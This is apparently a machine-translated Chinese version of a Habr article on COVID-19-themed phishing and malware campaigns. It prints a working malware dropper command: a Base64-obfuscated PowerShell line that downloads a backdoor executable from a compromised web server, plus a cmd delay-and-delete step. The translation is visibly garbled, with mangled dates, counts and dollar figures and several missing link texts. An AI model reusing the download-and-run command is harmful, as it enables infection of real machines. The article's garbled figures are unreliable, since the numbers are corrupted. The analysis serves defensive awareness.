攻擊者繼續利用 COVID-19 主題,為對與流行病相關的一切都非常感興趣的用戶製造越來越多的威脅。 在 我們已經討論了冠狀病毒之後出現了哪些類型的惡意軟體,今天我們將討論包括俄羅斯在內的不同國家的用戶已經遇到的社會工程技術。 一般趨勢和範例都在剪切範圍內。
記得在 我們談到人們不僅願意閱讀有關冠狀病毒和流行病過程的信息,還願意閱讀有關財政支持措施的信息? 這是一個很好的例子。 德國北萊茵-威斯特法倫州或北威州發現了一次有趣的網路釣魚攻擊。 攻擊者創建了經濟部網站的副本(),任何人都可以申請經濟援助。 這樣的程序確實存在,而且事實證明它對詐騙者有利。 收到受害者的個人資料後,他們在真正的部門網站上提出了申請,但提供了其他銀行詳細資料。 根據官方數據,在該計劃被發現之前,已經發出了 4 次此類虛假請求。 結果,原本為受影響公民提供的 109 億美元落入了詐欺者手中。
您想要免費檢測 COVID-19 嗎?
以冠狀病毒為主題的網路釣魚的另一個重要例子是 在電子郵件中。 這些訊息吸引了用戶的注意,並提出免費接受冠狀病毒感染檢測。 在這些附件中 有 Trickbot/Qakbot/Qbot 的實例。 當那些希望檢查自己健康狀況的人開始「填寫隨附的表格」時,惡意腳本就會被下載到電腦上。 為了避免沙盒測試,該腳本僅在一段時間後(當保護系統確信不會發生惡意活動時)才開始下載主要病毒。
說服大多數用戶啟用巨集也很容易。 為此,使用了一個標準技巧:要填寫問卷,您首先需要啟用巨集,這意味著您需要執行 VBA 腳本。
正如您所看到的,VBA 腳本經過專門屏蔽,免受防毒軟體的攻擊。
Windows 有一個等待功能,應用程式在接受預設的「是」答案之前等待 /T <秒>。 在我們的例子中,腳本在刪除臨時檔案之前等待了 65 秒:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
在等待期間,惡意軟體被下載。 為此啟動了一個特殊的 PowerShell 腳本:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
解碼 Base64 值後,PowerShell 腳本會下載位於先前被駭客入侵的德國 Web 伺服器上的後門:
http://automatischer-staubsauger.com/feature/777777.png並將其保存在名稱下:
C:UsersPublictmpdirfile1.exe
夾 ‘C:UsersPublictmpdir’ 運行包含該指令的“tmps1.bat”檔案時被刪除 cmd /c mkdir ""C:UsersPublictmpdir"".
針對政府機構的針對性攻擊
此外,FireEye 分析師最近報告了針對武漢政府機構以及中國緊急管理部的 APT32 攻擊。 其中一份分發的 RTF 包含紐約時報文章的鏈接,標題為 。 然而,在閱讀後,惡意軟體被下載(FireEye 分析師將該實例識別為 METALJACK)。
有趣的是,根據 Virustotal 的說法,在檢測時,沒有任何防毒軟體檢測到此實例。
當官方網站癱瘓時
網路釣魚攻擊最引人注目的例子就在前幾天發生在俄羅斯。 原因是為 3 至 16 歲兒童指定了一項期待已久的福利。 當 12 年 2020 月 XNUMX 日宣布開始接受申請時,數百萬人湧向國家服務網站尋求期待已久的幫助,並導致該門戶網站癱瘓,其嚴重程度不亞於專業的 DDoS 攻擊。 當總統說「政府服務無法應對申請流程」時,人們開始在網路上討論推出另一個接受申請的網站。
問題是,幾個網站同時開始工作,而真正的網站 posobie16.gosuslugi.ru 實際上接受申請,但更多 .
SearchInform 的同事在 .ru 區域中發現了大約 30 個新的詐欺網域。 自70月初以來,Infosecurity和Softline Company已追蹤到16多個類似的假政府服務網站。 它們的創作者使用了熟悉的符號,也使用了 gosuslugi、gosuslugi-XNUMX、vyplaty、covid-vyplaty、posobie 等單字的組合。
炒作和社會工程
所有這些例子都只能證實攻擊者正在成功地利用冠狀病毒主題獲利。 社會緊張程度越高,問題越不明確,詐騙者竊取重要數據、迫使人們自己放棄金錢或乾脆入侵更多電腦的機會就越大。
鑑於疫情迫使可能毫無準備的人們集體在家工作,不僅個人數據,而且公司數據都面臨風險。 例如,最近Microsoft 365(以前稱為Office 365)使用者也遭受了網路釣魚攻擊。 人們收到大量「錯過」的語音訊息作為信件的附件。 然而,這些文件實際上是一個 HTML 頁面,將攻擊的受害者發送到 。 因此,帳戶中的所有資料都會失去存取權限並受到損害。
來源: www.habr.com